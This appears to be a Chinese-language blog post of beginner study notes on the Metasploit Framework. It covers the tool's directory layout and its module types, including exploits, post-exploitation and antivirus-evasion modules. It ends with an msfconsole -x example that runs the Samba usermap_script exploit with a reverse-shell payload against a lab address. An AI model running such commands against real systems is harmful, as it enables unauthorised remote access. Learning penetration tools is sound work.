MSF学习(一)

简介

msf全称Metasploit Framework，是一款功能强大的开源渗透测试工具，它提供了丰富的漏洞利用模块、扫描工具、Payload生成器和框架等功能。MSF最初由HD Moore于2003年创建，现在由Rapid7维护和发展。 因为msf是一个框架，所以可以根据自己的需求进行功能开发。

本学习基本来自官网教程----https://www.offsec.com/metasploit-unleashed/filesystem-and-libraries/。 但是官网是英语，学习还是比较费劲的(英语lower的我)。

详解

msf体系图

msf在kali目录

主目录在\usr\share\metasploit-framework

• data目录包含Metasploit用于存储某些漏洞利用、单词列表、图像等所需的二进制文件的可编辑文件
• documentation目录包含框架的可用文档
• lib目录包含框架代码库的核心代码
• modules目录中，您可以找到用于漏洞利用的实际MSF模块、辅助模块和后期模块、有效载荷、编码器和nop生成器。也是最主要的模块，是接下来重点学习的部分
• plugins目录存储着msf的插件
• scripts目录存储着脚本文件
• tools目录中有各种有用的命令行实用程序

modules模块

modules既上文提到的modules目录。包含了很多模块，这些模块是msf最主要最常用的功能，基本上包含了整个渗透流程所需工具。 一共有七个模块，分别是Exploits，Auxiliary，Payloads，Encoders，Nops，Post，Evasion。

• Exploits，包含了很多漏洞的exp
• Auxiliary，是个辅助模块，主要用来信息收集，包括端口扫描仪、模糊器、嗅探器等
• Payloads，包含了很多漏洞的payload
• Encoders，编码模块，可以用来大多数的编码解码
• Nops，空操作模块，用于填充数据，以维持有效负载结构的完整性
• Post，后渗透模块，用于在目标系统上执行各种后渗透操作，如收集敏感信息、提权、横向移动等
• Evasion，免杀模块，用于生成一些免杀木马

msfcli

msfcli是早期的msf命令行接口，可以通过此接口来使用一些msf功能模块。 在2015-06-18后被弃用，可以使用msfconsole -x 来替代，例如：

root@kali:~# msfconsole -x "use exploit/multi/samba/usermap_script;\
set RHOST 172.16.194.172;\
set PAYLOAD cmd/unix/reverse;\
set LHOST 172.16.194.163;\
run"